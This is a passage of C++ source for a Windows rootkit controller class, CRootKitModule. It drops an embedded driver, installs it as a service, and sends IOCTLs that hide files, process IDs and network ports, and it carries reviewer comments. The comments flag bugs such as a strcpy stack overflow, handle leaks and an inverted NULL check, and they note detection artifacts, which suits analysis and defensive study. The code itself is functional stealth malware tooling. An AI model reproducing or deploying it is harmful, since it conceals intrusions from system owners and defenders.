	{
		if(GetLastError() == ERROR_SERVICE_ALREADY_RUNNING)
		{
			return nRet;
		}
	}

    CloseServiceHandle(schService);
    return nRet;
}

// Asks the Service Control Manager to stop the service named ServiceName.
//
// hSCManager  - an already-open SCM handle (the callers pass m_hSCManager).
// ServiceName - name of the service to stop.
// Returns FALSE when the service cannot be opened, otherwise the raw
// ControlService() result (non-zero on success). ERROR_SERVICE_NOT_ACTIVE and
// ERROR_INVALID_SERVICE_CONTROL are returned early; every other failure falls
// through and is returned as-is too, so the switch adds no distinct outcome.
//
// NOTE(review): both early returns inside the switch skip CloseServiceHandle()
// and leak schService; the handle is only released on the fall-through path.
// NOTE(review): ServiceStatus is filled by ControlService() but never read, so a
// stop that is merely pending is reported exactly like a completed one.
// NOTE(review): SERVICE_ALL_ACCESS is far more than the stop right this function
// needs; it also means the open typically fails for a non-elevated caller.
BOOL CRootKitModule::StopService(SC_HANDLE hSCManager, LPCTSTR ServiceName)
{
    SC_HANDLE      schService = NULL;
    SERVICE_STATUS ServiceStatus;
	int            nRet = 0;

    schService = OpenService(hSCManager, ServiceName, SERVICE_ALL_ACCESS);
    if(schService == NULL)
        return FALSE;

    nRet = ControlService(schService, SERVICE_CONTROL_STOP, &ServiceStatus);
	if(!nRet)
	{
		switch(GetLastError())
		{
		case ERROR_SERVICE_NOT_ACTIVE:
			return nRet;   // schService is leaked here

		case ERROR_INVALID_SERVICE_CONTROL:
			return nRet;   // and here
		}
	}
    
    CloseServiceHandle(schService);
    return nRet;
}
// Marks the service named ServiceName for deletion.
//
// hSCManager  - an already-open SCM handle.
// ServiceName - name of the service to delete.
// Returns FALSE when the service cannot be opened, otherwise the raw
// DeleteService() result. Unlike StopService(), the service handle is closed
// on every path after a successful open.
//
// NOTE(review): this does not stop the service first; per the Win32 contract
// DeleteService() only schedules removal, so callers are expected to call
// StopService() beforehand (DeleteDriver() and CreateDriver() do).
// NOTE(review): SERVICE_ALL_ACCESS is requested where DELETE would suffice.
BOOL CRootKitModule::RemoveService(SC_HANDLE hSCManager, LPCTSTR ServiceName)
{
    SC_HANDLE schService;
    int	      nRet = 0;

    schService = OpenService(hSCManager, ServiceName, SERVICE_ALL_ACCESS);
    if(schService == NULL)
		return FALSE;

    nRet = DeleteService(schService);

    CloseServiceHandle(schService);

    return nRet;
}

// Opens a handle to the driver's device object (MY_DEVICE_NAME, defined
// elsewhere) for the DeviceIoControl() wrappers below.
//
// Returns the raw CreateFile() handle: INVALID_HANDLE_VALUE on failure (which
// is what every caller compares against), never NULL. The open uses no sharing
// and OPEN_EXISTING, so it fails unless the driver is loaded and the device
// name already exists.
// NOTE(review): the device name is a fixed string compiled into the binary and
// is therefore a stable artifact for detecting this tool.
HANDLE CRootKitModule::_CreateFile()
{
	return CreateFile(MY_DEVICE_NAME,GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); 
}

// Stops and removes the driver service, reporting only whether RemoveService()
// succeeded (StopService()'s result is discarded on both paths).
//
// szDriver - explicit service name; when NULL the stored m_strDriverName is
//            apparently meant to be used instead.
//
// NOTE(review): the condition is inverted. `if( !szDriver)` takes the first
// branch only when szDriver is NULL and then forwards that NULL to
// StopService()/RemoveService(), which presumably fail in OpenService(); a
// non-NULL szDriver is ignored and m_strDriverName is used instead. The intent
// is almost certainly `if (szDriver)`.
// CW2T yields a temporary that lives for the duration of each call, so the
// conversions themselves are safe here.
bool CRootKitModule::DeleteDriver(LPCTSTR szDriver )
{
	if( !szDriver)
	{
		StopService(m_hSCManager, szDriver);
		return !!RemoveService(m_hSCManager, szDriver);
	}
	StopService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
	return !!RemoveService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
	
	
}
// Drops the embedded driver image to szFileName and (re)installs it as a
// service named szDriver.
//
// Steps: (1) create or overwrite szFileName and write g_szRootKitModule into it
// (the `sizeof - 1` suggests the image is held as a NUL-terminated char array -
// confirm against its definition); (2) remember szDriver in m_strDriverName;
// (3) stop and delete any existing service of that name; (4) InstallService()
// (defined elsewhere) with the dropped file as the service binary.
// Returns true only if InstallService() reports success.
//
// NOTE(review): hFile is never checked against INVALID_HANDLE_VALUE and the
// WriteFile() result / dwBytes are ignored, so a failed or short write still
// proceeds to install a service pointing at a missing or truncated file.
// NOTE(review): the StopDriver() and RemoveService() results are discarded.
// NOTE(review): szFileName/szDriver are LPCSTR but are passed to LPCTSTR
// parameters (RemoveService, InstallService), so this only compiles in a
// non-UNICODE build.
// NOTE(review): write-embedded-driver-then-install-service is the defining
// behaviour of this module and a natural detection point (file creation
// followed by service installation from the same process).
bool CRootKitModule::CreateDriver(LPCSTR szFileName, LPCSTR szDriver)
{

	HANDLE hFile=CreateFile(szFileName,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
    DWORD dwBytes;
    WriteFile(hFile,g_szRootKitModule,sizeof(g_szRootKitModule) - 1,&dwBytes,NULL);
    CloseHandle(hFile);

	m_strDriverName = ATL::CT2W(szDriver);
	StopDriver();
	RemoveService(m_hSCManager, szDriver);
	if ( !InstallService(m_hSCManager, szDriver, szFileName) )
		return false;
	return true;
}

// Starts the service recorded in m_strDriverName (set by CreateDriver()).
// Returns the StartService() result coerced to bool. The member is held as a
// wide string and converted with CW2T for the call.
bool CRootKitModule::StartDriver()
{
	return !!StartService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
}
// Stops the service recorded in m_strDriverName via StopService().
// Returns the StopService() result coerced to bool; see StopService() for the
// cases in which it returns FALSE.
bool CRootKitModule::StopDriver()
{
	return !!StopService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
}
// Registers a file name with the driver so that it is hidden
// (IOCTL ZFJ_ROOTKIT_ADDHIDEFILE). The name is converted to ANSI and
// upper-cased before it is sent, so the driver presumably matches on the
// upper-cased form - confirm against the driver source.
//
// szFile - file name/path to hide.
// Returns false if the device cannot be opened or the IOCTL fails; the device
// handle is closed on both paths. szInBuff doubles as the output buffer and the
// returned bytes are never inspected.
//
// NOTE(review): strcpy() into a fixed 256-byte stack buffer with no length
// check - a name of 256 or more characters overflows the stack frame.
// NOTE(review): the input length is strlen(szFile) (the LPCTSTR argument), not
// strlen(szInBuff); this compiles only when TCHAR is char and is inconsistent
// with DelHideFile(), which measures szInBuff. The terminating NUL is not
// counted, so the driver must not depend on it.
bool CRootKitModule::AddHideFile(LPCTSTR szFile)
{
	HANDLE hDevice = _CreateFile();
	if (hDevice==INVALID_HANDLE_VALUE) 
		return false;
	char szInBuff[256];
	strcpy(szInBuff, ATL::CT2A(szFile));   // unbounded copy
	_strupr(szInBuff);
	DWORD dwBytesReturned;
	if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_ADDHIDEFILE,szInBuff,(DWORD)strlen(szFile), szInBuff, 256, &dwBytesReturned,NULL))) 
	{
	CloseHandle(hDevice); 
	return FALSE; 
	}
	CloseHandle(hDevice); 
	return true;
}
// Removes a file name from the driver's hidden set
// (IOCTL ZFJ_ROOTKIT_DELHIDEFILE). The name is converted to ANSI and
// upper-cased exactly as in AddHideFile(), so both sides see the same key.
//
// szFile - file name/path previously passed to AddHideFile().
// Returns false if the device cannot be opened or the IOCTL fails; the device
// handle is closed on both paths. szInBuff doubles as the output buffer and the
// returned bytes are never inspected.
//
// NOTE(review): strcpy() into a fixed 256-byte stack buffer with no length
// check - a name of 256 or more characters overflows the stack frame.
// The input length is strlen(szInBuff) (the converted buffer), excluding the
// terminating NUL.
bool CRootKitModule::DelHideFile(LPCTSTR szFile)
{
	HANDLE hDevice = _CreateFile();
	if (hDevice==INVALID_HANDLE_VALUE) 
		return false;
	char szInBuff[256];
	strcpy(szInBuff, ATL::CT2A(szFile));   // unbounded copy
	_strupr(szInBuff);
	DWORD dwBytesReturned;
	if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_DELHIDEFILE,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL))) 
	{
	CloseHandle(hDevice); 
	return FALSE; 
	}
	CloseHandle(hDevice); 
	return true;
}
// Switches the driver's file-hiding on (IOCTL ZFJ_ROOTKIT_STARTHIDEFILE).
//
// No payload is sent: szInBuff is empty, so the declared input length is
// strlen("") == 0; the same buffer is offered as a 256-byte output buffer and
// any returned data is ignored.
// Returns false if the device cannot be opened or the IOCTL fails; the device
// handle is closed on both paths.
bool CRootKitModule::StartHideFile()
{
	HANDLE hDevice = _CreateFile();
	if (hDevice==INVALID_HANDLE_VALUE) 
		return false;
	char szInBuff[256] = "";
	DWORD dwBytesReturned;
	if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_STARTHIDEFILE,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL))) 
	{
	CloseHandle(hDevice); 
	return FALSE; 
	}
	CloseHandle(hDevice); 
	return true;
}

// Asks the driver to hide the process with id dwId
// (IOCTL ZFJ_ROOTKIT_ADDHIDEPROCESS). The DWORD is copied raw into the first
// four bytes of szInBuff.
//
// dwId - process id to hide.
// Returns false if the device cannot be opened or the IOCTL fails; the device
// handle is closed on both paths.
//
// NOTE(review): the input size is strlen(szInBuff) - the count of leading
// non-zero bytes of the binary PID - rather than sizeof(DWORD). Realistic PIDs
// have zero high-order bytes in memory, so fewer than four bytes are declared
// (zero for dwId == 0 or any PID whose lowest byte is 0). What the driver
// actually reads then depends on how it validates the input length. The
// intended value is sizeof(DWORD).
bool CRootKitModule::AddHideProcessId(DWORD dwId)
{
	HANDLE hDevice = _CreateFile();
	if (hDevice==INVALID_HANDLE_VALUE) 
		return false;
	char szInBuff[256] = "";
	memcpy(szInBuff, &dwId, sizeof(DWORD));
	DWORD dwBytesReturned;
	if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_ADDHIDEPROCESS,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL))) 
	{
	CloseHandle(hDevice); 
	return FALSE; 
	}
	CloseHandle(hDevice); 
	return true;
}
// Asks the driver to stop hiding the process with id dwId
// (IOCTL ZFJ_ROOTKIT_DELHIDEPROCESS). The DWORD is copied raw into the first
// four bytes of szInBuff.
//
// dwId - process id previously passed to AddHideProcessId().
// Returns false if the device cannot be opened or the IOCTL fails; the device
// handle is closed on both paths.
//
// NOTE(review): as in AddHideProcessId(), the input size is strlen() of a
// binary DWORD, not sizeof(DWORD), so the declared length is usually shorter
// than the value actually placed in the buffer.
bool CRootKitModule::DelHideProcessId(DWORD dwId)
{
	HANDLE hDevice = _CreateFile();
	if (hDevice==INVALID_HANDLE_VALUE) 
		return false;
	char szInBuff[256] = "";
	memcpy(szInBuff, &dwId, sizeof(DWORD));
	DWORD dwBytesReturned;
	if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_DELHIDEPROCESS,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL))) 
	{
	CloseHandle(hDevice); 
	return FALSE; 
	}
	CloseHandle(hDevice); 
	return true;
}
// Switches the driver's process-hiding on (IOCTL ZFJ_ROOTKIT_STARTHIDEPROCESS).
//
// No payload is sent: szInBuff is empty, so the declared input length is 0;
// the same buffer is offered as a 256-byte output buffer and any returned data
// is ignored.
// Returns false if the device cannot be opened or the IOCTL fails; the device
// handle is closed on both paths.
bool CRootKitModule::StartHideProcess()
{
	HANDLE hDevice = _CreateFile();
	if (hDevice==INVALID_HANDLE_VALUE) 
		return false;
	char szInBuff[256] = "";
	DWORD dwBytesReturned;
	if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_STARTHIDEPROCESS,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL))) 
	{
	CloseHandle(hDevice); 
	return FALSE; 
	}
	CloseHandle(hDevice); 
	return true;
}


// Asks the driver to hide the network port dwPort
// (IOCTL ZFJ_ROOTKIT_ADDHIDEPORT). The DWORD is copied raw into the first four
// bytes of szInBuff; whether the driver expects host or network byte order is
// not visible here - confirm against the driver source.
//
// dwPort - port number to hide.
// Returns false if the device cannot be opened or the IOCTL fails; the device
// handle is closed on both paths.
//
// NOTE(review): the input size is strlen(szInBuff) of a binary DWORD, not
// sizeof(DWORD). A port value fits in two bytes, so at most two bytes are ever
// declared, and zero if the low byte is 0 (e.g. port 256 or 1024).
bool CRootKitModule::AddHidePort(DWORD dwPort)
{
	HANDLE hDevice = _CreateFile();
	if (hDevice==INVALID_HANDLE_VALUE) 
		return false;
	char szInBuff[256] = "";
	memcpy(szInBuff, &dwPort, sizeof(DWORD));
	DWORD dwBytesReturned;
	if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_ADDHIDEPORT,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL))) 
	{
	CloseHandle(hDevice); 
	return FALSE; 
	}
	CloseHandle(hDevice); 
	return true;
}
// Asks the driver to stop hiding the network port dwPort
// (IOCTL ZFJ_ROOTKIT_DELHIDEPORT). The DWORD is copied raw into the first four
// bytes of szInBuff.
//
// dwPort - port number previously passed to AddHidePort().
// Returns false if the device cannot be opened or the IOCTL fails; the device
// handle is closed on both paths.
//
// NOTE(review): as in AddHidePort(), the input size is strlen() of a binary
// DWORD rather than sizeof(DWORD), so the declared length depends on the port
// value and can be zero.
bool CRootKitModule::DelHidePort(DWORD dwPort)
{
	HANDLE hDevice = _CreateFile();
	if (hDevice==INVALID_HANDLE_VALUE) 
		return false;
	char szInBuff[256] = "";
	memcpy(szInBuff, &dwPort, sizeof(DWORD));
	DWORD dwBytesReturned;
	if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_DELHIDEPORT,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL))) 
	{
	CloseHandle(hDevice); 
	return FALSE; 
	}
	CloseHandle(hDevice); 
	return true;
}
// Switches the driver's port-hiding on (IOCTL ZFJ_ROOTKIT_STARTHIDEPORT).
//
// No payload is sent: szInBuff is empty, so the declared input length is 0;
// the same buffer is offered as a 256-byte output buffer and any returned data
// is ignored.
// Returns false if the device cannot be opened or the IOCTL fails; the device
// handle is closed on both paths.
bool CRootKitModule::StartHidePort()
{
	HANDLE hDevice = _CreateFile();
	if (hDevice==INVALID_HANDLE_VALUE) 
		return false;
	char szInBuff[256] = "";
	DWORD dwBytesReturned;
	if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_STARTHIDEPORT,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL))) 
	{
	CloseHandle(hDevice); 
	return FALSE; 
	}
	CloseHandle(hDevice); 
	return true;
}
